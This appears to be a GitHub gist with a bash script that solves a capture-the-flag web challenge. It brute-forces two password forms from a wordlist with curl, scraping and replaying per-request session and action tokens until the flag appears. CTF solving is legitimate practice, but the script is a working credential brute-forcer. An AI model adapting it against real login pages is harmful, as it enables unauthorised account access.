Skip to content

Instantly share code, notes, and snippets.

@jirojo2
Created April 1, 2017 02:05
Show Gist options
  • Save jirojo2/9637bdb2f971ffa58842a472862210e3 to your computer and use it in GitHub Desktop.
Save jirojo2/9637bdb2f971ffa58842a472862210e3 to your computer and use it in GitHub Desktop.
Solving the rabbits challenge: http://challenge.followthewhiterabbit.es:1234/ - @KALRONG 's style
#!/bin/bash
for word in $(cat passwordlist.lst)
do
tokens=$(curl -c cookie.txt -b cookie.txt http://challenge.followthewhiterabbit.es:1234/ 2>/dev/null | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
token1=$(echo $tokens | cut -d' ' -f1)
token2=$(echo $tokens | cut -d' ' -f2)
echo "attempting word $word"
result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2&pass_try=$word&submit=" http://challenge.followthewhiterabbit.es:1234/ 2>/dev/null)
echo $result > latest.html
if [ $(echo $result | grep 'second.php' | wc -l) -eq "1" ]; then
first_pass=$word
echo "The first password is: $word"
tokens=$(echo $result | tr " " "\n" | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
token1=$(echo $tokens | cut -d' ' -f1)
token2=$(echo $tokens | cut -d' ' -f2)
result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2" http://challenge.followthewhiterabbit.es:1234/second.php?action=$token2 2>/dev/null)
tokens=$(echo $result | sed -E "s/.*action=(.*)\".*/\1/")
result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$tokens&token_action=$tokens" http://challenge.followthewhiterabbit.es:1234/third.php?action=$tokens 2>/dev/null)
tokens=$(echo $result | sed -E "s/.*action=(.*)\".*/\1/")
result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$tokens&token_action=$tokens" http://challenge.followthewhiterabbit.es:1234/final.php?action=$tokens 2>/dev/null)
tokens=$(echo $result | tr " " "\n" | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
token1=$(echo $tokens | cut -d' ' -f1)
token2=$(echo $tokens | cut -d' ' -f2)
for word in $(cat passwordlist.lst)
do
echo "attempting word $word"
result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2&pass_try=$word&submit=" http://challenge.followthewhiterabbit.es:1234/final.php 2>/dev/null)
echo $result > latest.html
if [ $(echo $result | grep 'Start over' | wc -l) -ne "1" ]; then
echo "The final password is: $word"
echo $result | grep flag
exit
fi
tokens=$(curl -c cookie.txt -b cookie.txt http://challenge.followthewhiterabbit.es:1234/ 2>/dev/null | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
token1=$(echo $tokens | cut -d' ' -f1)
token2=$(echo $tokens | cut -d' ' -f2)
result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2&pass_try=$first_pass&submit=" http://challenge.followthewhiterabbit.es:1234/ 2>/dev/null)
tokens=$(echo $result | tr " " "\n" | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
token1=$(echo $tokens | cut -d' ' -f1)
token2=$(echo $tokens | cut -d' ' -f2)
result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$token1&token_action=$token2" http://challenge.followthewhiterabbit.es:1234/second.php?action=$token2 2>/dev/null)
tokens=$(echo $result | sed -E "s/.*action=(.*)\".*/\1/")
result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$tokens&token_action=$tokens" http://challenge.followthewhiterabbit.es:1234/third.php?action=$tokens 2>/dev/null)
tokens=$(echo $result | sed -E "s/.*action=(.*)\".*/\1/")
result=$(curl -c cookie.txt -b cookie.txt -XPOST -d "token_session=$tokens&token_action=$tokens" http://challenge.followthewhiterabbit.es:1234/final.php?action=$tokens 2>/dev/null)
tokens=$(echo $result | tr " " "\n" | grep value= | head -n2 | sed -E "s/.*value=(.*)>/\1/")
token1=$(echo $tokens | cut -d' ' -f1)
token2=$(echo $tokens | cut -d' ' -f2)
done
exit
fi
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment